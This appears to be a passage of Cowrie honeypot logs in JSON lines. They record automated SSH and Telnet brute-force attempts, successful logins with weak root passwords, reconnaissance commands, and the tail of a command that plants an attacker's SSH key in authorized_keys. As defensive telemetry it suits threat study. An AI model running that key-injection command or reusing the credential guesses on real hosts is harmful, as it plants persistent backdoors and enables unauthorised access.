AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-08-26T19:42:21.651943Z","src_ip":"167.172.153.88","session":"64cc423a349f"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-08-26T19:42:21.747797Z","src_ip":"167.172.153.88","session":"64cc423a349f"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.1 seconds","sensor":"my-vps","timestamp":"2025-08-26T19:42:21.748837Z","src_ip":"167.172.153.88","session":"64cc423a349f"}
{"eventid":"cowrie.session.connect","src_ip":"167.172.153.88","src_port":47854,"dst_ip":"1.2.3.4","dst_port":22,"session":"107c6f959cfb","protocol":"ssh","message":"New connection: 167.172.153.88:47854 (1.2.3.4:22) [session: 107c6f959cfb]","sensor":"my-vps","timestamp":"2025-08-26T19:42:21.839089Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T19:42:21.840005Z","src_ip":"167.172.153.88","session":"107c6f959cfb"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T19:42:21.931434Z","src_ip":"167.172.153.88","session":"107c6f959cfb"}
{"eventid":"cowrie.session.closed","duration":"1.6","message":"Connection lost after 1.6 seconds","sensor":"my-vps","timestamp":"2025-08-26T19:42:22.162734Z","src_ip":"199.195.248.191","session":"fa543a2802d3"}
{"eventid":"cowrie.session.connect","src_ip":"199.195.248.191","src_port":42180,"dst_ip":"1.2.3.4","dst_port":22,"session":"53b78dbab3da","protocol":"ssh","message":"New connection: 199.195.248.191:42180 (1.2.3.4:22) [session: 53b78dbab3da]","sensor":"my-vps","timestamp":"2025-08-26T19:42:22.248024Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T19:42:22.260793Z","src_ip":"199.195.248.191","session":"53b78dbab3da"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-08-26T19:42:22.341530Z","src_ip":"167.172.153.88","session":"107c6f959cfb"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T19:42:22.350993Z","src_ip":"199.195.248.191","session":"53b78dbab3da"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-08-26T19:42:22.708831Z","src_ip":"199.195.248.191","session":"53b78dbab3da"}
{"eventid":"cowrie.session.closed","duration":"3.5","message":"Connection lost after 3.5 seconds","sensor":"my-vps","timestamp":"2025-08-26T19:42:22.800585Z","src_ip":"199.195.248.191","session":"dec60daeac78"}
{"eventid":"cowrie.session.closed","duration":"0.6","message":"Connection lost after 0.6 seconds","sensor":"my-vps","timestamp":"2025-08-26T19:42:22.801482Z","src_ip":"199.195.248.191","session":"53b78dbab3da"}
{"eventid":"cowrie.session.closed","duration":"1.6","message":"Connection lost after 1.6 seconds","sensor":"my-vps","timestamp":"2025-08-26T19:42:23.435117Z","src_ip":"167.172.153.88","session":"107c6f959cfb"}
{"eventid":"cowrie.session.connect","src_ip":"167.172.153.88","src_port":47866,"dst_ip":"1.2.3.4","dst_port":22,"session":"1a3ea7635053","protocol":"ssh","message":"New connection: 167.172.153.88:47866 (1.2.3.4:22) [session: 1a3ea7635053]","sensor":"my-vps","timestamp":"2025-08-26T19:42:23.526177Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T19:42:23.528897Z","src_ip":"167.172.153.88","session":"1a3ea7635053"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T19:42:23.620075Z","src_ip":"167.172.153.88","session":"1a3ea7635053"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-08-26T19:42:23.988429Z","src_ip":"167.172.153.88","session":"1a3ea7635053"}
{"eventid":"cowrie.session.closed","duration":"3.5","message":"Connection lost after 3.5 seconds","sensor":"my-vps","timestamp":"2025-08-26T19:42:24.081890Z","src_ip":"167.172.153.88","session":"64cc423a349f"}
{"eventid":"cowrie.session.closed","duration":"0.6","message":"Connection lost after 0.6 seconds","sensor":"my-vps","timestamp":"2025-08-26T19:42:24.083119Z","src_ip":"167.172.153.88","session":"1a3ea7635053"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":28048,"dst_ip":"1.2.3.4","dst_port":22,"session":"77c33bbc116a","protocol":"ssh","message":"New connection: 212.227.235.229:28048 (1.2.3.4:22) [session: 77c33bbc116a]","sensor":"my-vps","timestamp":"2025-08-26T19:42:28.375015Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T19:42:28.528885Z","src_ip":"212.227.235.229","session":"77c33bbc116a"}
{"eventid":"cowrie.session.connect","src_ip":"217.154.1.158","src_port":36688,"dst_ip":"1.2.3.4","dst_port":22,"session":"f98ba80eb448","protocol":"ssh","message":"New connection: 217.154.1.158:36688 (1.2.3.4:22) [session: f98ba80eb448]","sensor":"my-vps","timestamp":"2025-08-26T19:42:28.706342Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T19:42:28.707234Z","src_ip":"217.154.1.158","session":"f98ba80eb448"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T19:42:28.722047Z","src_ip":"217.154.1.158","session":"f98ba80eb448"}
{"eventid":"cowrie.login.success","username":"root","password":"passw0rd","message":"login attempt [root/passw0rd] succeeded","sensor":"my-vps","timestamp":"2025-08-26T19:42:28.781211Z","src_ip":"217.154.1.158","session":"f98ba80eb448"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T19:42:28.807160Z","src_ip":"212.227.235.229","session":"77c33bbc116a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T19:42:28.885656Z","src_ip":"217.154.1.158","session":"f98ba80eb448"}
{"eventid":"cowrie.command.input","input":"uname -s -v -n -r -m","message":"CMD: uname -s -v -n -r -m","sensor":"my-vps","timestamp":"2025-08-26T19:42:28.886339Z","src_ip":"217.154.1.158","session":"f98ba80eb448"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","size":70,"shasum":"7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","duplicate":true,"duration":"0.0","message":"Closing TTY Log: var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804 after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T19:42:28.900942Z","src_ip":"217.154.1.158","session":"f98ba80eb448"}
{"eventid":"cowrie.session.closed","duration":"0.2","message":"Connection lost after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-26T19:42:28.901841Z","src_ip":"217.154.1.158","session":"f98ba80eb448"}
{"eventid":"cowrie.login.success","username":"root","password":"Password64","message":"login attempt [root/Password64] succeeded","sensor":"my-vps","timestamp":"2025-08-26T19:42:29.772821Z","src_ip":"212.227.235.229","session":"77c33bbc116a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T19:42:30.970536Z","src_ip":"212.227.235.229","session":"77c33bbc116a"}
{"eventid":"cowrie.command.input","input":"hostname","message":"CMD: hostname","sensor":"my-vps","timestamp":"2025-08-26T19:42:30.971256Z","src_ip":"212.227.235.229","session":"77c33bbc116a"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/7063dece7cccf374d9fa1ee30ff23300fa42477e064e69be7bb6d01c0cfff682","size":13,"shasum":"7063dece7cccf374d9fa1ee30ff23300fa42477e064e69be7bb6d01c0cfff682","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/7063dece7cccf374d9fa1ee30ff23300fa42477e064e69be7bb6d01c0cfff682 after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T19:42:31.303715Z","src_ip":"212.227.235.229","session":"77c33bbc116a"}
{"eventid":"cowrie.session.closed","duration":"3.1","message":"Connection lost after 3.1 seconds","sensor":"my-vps","timestamp":"2025-08-26T19:42:31.477140Z","src_ip":"212.227.235.229","session":"77c33bbc116a"}
{"eventid":"cowrie.session.connect","src_ip":"217.154.1.158","src_port":47128,"dst_ip":"1.2.3.4","dst_port":22,"session":"f119169844f8","protocol":"ssh","message":"New connection: 217.154.1.158:47128 (1.2.3.4:22) [session: f119169844f8]","sensor":"my-vps","timestamp":"2025-08-26T19:42:46.251270Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T19:42:46.252673Z","src_ip":"217.154.1.158","session":"f119169844f8"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T19:42:46.267171Z","src_ip":"217.154.1.158","session":"f119169844f8"}
{"eventid":"cowrie.login.failed","username":"rancher","password":"rancher","message":"login attempt [rancher/rancher] failed","sensor":"my-vps","timestamp":"2025-08-26T19:42:46.312227Z","src_ip":"217.154.1.158","session":"f119169844f8"}
{"eventid":"cowrie.session.connect","src_ip":"121.183.135.48","src_port":36228,"dst_ip":"1.2.3.4","dst_port":23,"session":"b25b0754a4d7","protocol":"telnet","message":"New connection: 121.183.135.48:36228 (1.2.3.4:23) [session: b25b0754a4d7]","sensor":"my-vps","timestamp":"2025-08-26T19:42:47.038954Z"}
{"eventid":"cowrie.session.closed","duration":"1.1","message":"Connection lost after 1.1 seconds","sensor":"my-vps","timestamp":"2025-08-26T19:42:47.328102Z","src_ip":"217.154.1.158","session":"f119169844f8"}
{"eventid":"cowrie.session.connect","src_ip":"217.154.1.158","src_port":37820,"dst_ip":"1.2.3.4","dst_port":22,"session":"8c3bff708038","protocol":"ssh","message":"New connection: 217.154.1.158:37820 (1.2.3.4:22) [session: 8c3bff708038]","sensor":"my-vps","timestamp":"2025-08-26T19:43:03.725122Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T19:43:03.726007Z","src_ip":"217.154.1.158","session":"8c3bff708038"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T19:43:03.739692Z","src_ip":"217.154.1.158","session":"8c3bff708038"}
{"eventid":"cowrie.login.failed","username":"es","password":"123456","message":"login attempt [es/123456] failed","sensor":"my-vps","timestamp":"2025-08-26T19:43:03.788613Z","src_ip":"217.154.1.158","session":"8c3bff708038"}
{"eventid":"cowrie.session.closed","duration":"1.1","message":"Connection lost after 1.1 seconds","sensor":"my-vps","timestamp":"2025-08-26T19:43:04.805179Z","src_ip":"217.154.1.158","session":"8c3bff708038"}
{"eventid":"cowrie.session.closed","duration":30.581319332122803,"message":"Connection lost after 30 seconds","sensor":"my-vps","timestamp":"2025-08-26T19:43:17.620173Z","src_ip":"121.183.135.48","session":"b25b0754a4d7"}
{"eventid":"cowrie.session.connect","src_ip":"217.154.1.158","src_port":59004,"dst_ip":"1.2.3.4","dst_port":22,"session":"a6c207d8c54c","protocol":"ssh","message":"New connection: 217.154.1.158:59004 (1.2.3.4:22) [session: a6c207d8c54c]","sensor":"my-vps","timestamp":"2025-08-26T19:43:21.300488Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T19:43:21.301563Z","src_ip":"217.154.1.158","session":"a6c207d8c54c"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T19:43:21.315696Z","src_ip":"217.154.1.158","session":"a6c207d8c54c"}
{"eventid":"cowrie.login.failed","username":"root","password":"root","message":"login attempt [root/root] failed","sensor":"my-vps","timestamp":"2025-08-26T19:43:21.358896Z","src_ip":"217.154.1.158","session":"a6c207d8c54c"}
{"eventid":"cowrie.session.connect","src_ip":"199.195.248.191","src_port":39242,"dst_ip":"1.2.3.4","dst_port":22,"session":"983ab0f1b84e","protocol":"ssh","message":"New connection: 199.195.248.191:39242 (1.2.3.4:22) [session: 983ab0f1b84e]","sensor":"my-vps","timestamp":"2025-08-26T19:43:22.188556Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T19:43:22.195718Z","src_ip":"199.195.248.191","session":"983ab0f1b84e"}
